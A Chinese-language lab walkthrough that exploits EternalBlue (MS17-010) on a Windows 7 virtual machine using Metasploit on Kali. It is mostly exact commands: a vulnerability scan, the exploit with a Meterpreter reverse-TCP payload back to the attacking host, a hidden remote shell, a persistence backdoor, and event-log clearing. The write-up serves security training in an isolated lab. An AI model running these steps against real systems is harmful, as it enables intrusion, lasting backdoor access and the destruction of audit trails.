参考资料:《Kali Linux 2 网络渗透测试实践指南》
参考教程:https://blog.csdn.net/qq_36119192/article/details/83215257
攻击主机系统:Kali Linux 2
目标主机系统:Windows7 x64
两台主机均为VMware虚拟机,网络连接方式均为NAT,可以互相Ping通。
首先启动Metasploit:
msfconsole
这一次选择MS17_010漏洞,就是永恒之蓝漏洞来入侵Windows7。
查找MS17_010漏洞相关的信息:
search ms17_010
查找结果如图所示,找到了四个模块。第二个辅助模块是探测主机是否存在MS17_010漏洞,第三个是漏洞利用模块。
先探测一下有哪些主机存在漏洞。
选择这个辅助模块:
use auxiliary/scanner/smb/smb_ms17_010
设置要探测主机的ip或ip范围:
set RHOSTS 192.168.113.128-192.168.113.133
输入exploit开始探测。
前面显示+号的就是可能存在漏洞的主机。这里因为我只开了一个虚拟机(就是windows7),所以只探测到了一个。
选择漏洞利用模块:
use exploit/windows/smb/ms17_010_eternalblue
其实应该使用show options查看一下需要设置的参数,这里忽略了这一步。
查看payloads:
show payloads
设置payload:
set payload windows/x64/meterpreter/reverse_tcp
设置RHOST,也就是目标主机的IP:
set RHOST 192.168.113.133
设置LHOST,也就是我们主机的IP:
set LHOST 192.168.113.130
如果不设置RPORT的话,默认使用4444端口监听,这里就不设置了。
输入exploit或者run开始攻击。
攻击成功:
出现了meterpreter>,可以用它控制目标计算机进行一系列的操作。
meterpreter常见命令和参数:https://www.cnblogs.com/backlion/p/9484949.html
查看目标主机的系统信息:
sysinfo
进入桌面,并且创建一个文件夹:
打开cmd并且隐藏到后台执行:
execute -H -i -f cmd.exe
在QNKCDZO文件夹下创建一个1.txt文件:
C:\Users\Administrator\Desktop\QNKCDZO>cd.>1.txt
在文件里写入“QNKCDZO”:
C:\Users\Administrator\Desktop\QNKCDZO>echo QNKCDZO>1.txt
输入exit退出cmd。
此时去目标主机上查看,会发现文件夹和文件已经成功建立:
输入screenshot截屏:
接下来通过服务启动生成一个持续性后门。
run persistence -X -i 5 -p 8888 -r 192.168.113.133
我们在目标主机上可以看到这个文件,是一个vbs脚本文件:
检查一下端口占用情况,可以发现目标主机连接着我们的4444端口:
使用clearev来清除日志文件: